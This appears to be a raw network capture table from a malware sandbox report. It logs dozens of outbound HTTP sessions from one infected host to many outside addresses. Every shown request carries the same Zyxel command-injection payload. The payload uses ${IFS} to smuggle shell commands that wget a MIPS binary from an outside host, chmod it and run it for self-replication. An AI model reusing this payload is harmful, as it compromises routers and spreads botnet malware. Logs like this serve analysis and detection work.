                                      Jan 19, 2024 17:29:41.960619926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6647192.168.2.143862672.229.206.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960648060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6648192.168.2.1447746201.102.208.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960678101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6649192.168.2.1439860119.246.218.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960721016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6650192.168.2.1439020108.129.175.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960762978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6651192.168.2.145340265.191.146.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960800886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6652192.168.2.1436702108.140.56.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960834980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6653192.168.2.1438376121.66.59.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960895061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6654192.168.2.144367260.101.235.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960930109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6655192.168.2.1446526194.0.52.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.960978031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6656192.168.2.1452206115.138.117.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961039066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6657192.168.2.1453466147.93.106.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961067915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6658192.168.2.1444740176.32.168.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961121082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6659192.168.2.1443848222.144.180.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961167097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6660192.168.2.143989247.186.17.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961205006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6661192.168.2.145608679.26.72.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961246014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6662192.168.2.144224874.192.13.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961270094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6663192.168.2.144172239.241.99.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961321115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6664192.168.2.144120299.26.82.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961364031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6665192.168.2.1442568145.142.96.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961401939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6666192.168.2.143565664.85.4.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961437941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6667192.168.2.1437450194.227.96.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961479902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6668192.168.2.1455162140.93.122.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961510897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6669192.168.2.143562450.77.7.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961560965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6670192.168.2.1453740208.245.164.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961601019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6671192.168.2.146084643.120.202.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961647987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6672192.168.2.1456162133.225.191.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961697102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6673192.168.2.143557484.53.39.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961736917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6674192.168.2.1438272193.98.14.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961791039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6675192.168.2.143642677.116.133.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961834908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6676192.168.2.145423487.172.81.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961879015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6677192.168.2.144447885.16.71.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961919069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6678192.168.2.1456080197.59.14.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961946964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6679192.168.2.1437616187.239.27.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.961993933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6680192.168.2.143768414.177.245.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962038994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6681192.168.2.143939241.169.240.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962076902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6682192.168.2.144582453.181.139.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962122917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6683192.168.2.145694863.108.5.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962174892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6684192.168.2.1451160170.220.253.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962218046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6685192.168.2.1437372146.172.121.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962259054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6686192.168.2.144162258.117.132.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962285995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6687192.168.2.1441382113.173.60.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962307930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6688192.168.2.1452682153.132.224.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962359905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6689192.168.2.1454086156.186.86.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962395906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6690192.168.2.144739688.229.236.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962419987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6691192.168.2.144015459.71.166.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962482929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6692192.168.2.1449666209.139.127.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962536097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6693192.168.2.1457494222.138.94.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962554932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6694192.168.2.144789681.120.164.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962600946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6695192.168.2.1460102107.221.247.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962629080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6696192.168.2.1457542116.14.17.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962675095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6697192.168.2.1458696223.241.40.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962734938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6698192.168.2.145644047.210.19.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962773085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6699192.168.2.1449180168.18.233.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962814093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6700192.168.2.1459932217.0.70.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962865114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6701192.168.2.1438230117.254.145.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962898016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6702192.168.2.1460234184.245.181.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962951899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6703192.168.2.1458184108.186.186.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.962992907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6704192.168.2.1458362212.202.237.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963037968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6705192.168.2.1440634112.209.171.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963089943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6706192.168.2.1453178123.169.203.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963119030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6707192.168.2.14467769.1.246.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963165998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6708192.168.2.144317443.142.22.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963198900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6709192.168.2.145456034.254.16.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.963253021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6710192.168.2.1459720190.104.10.89443
                                      TimestampBytes transferredDirectionData
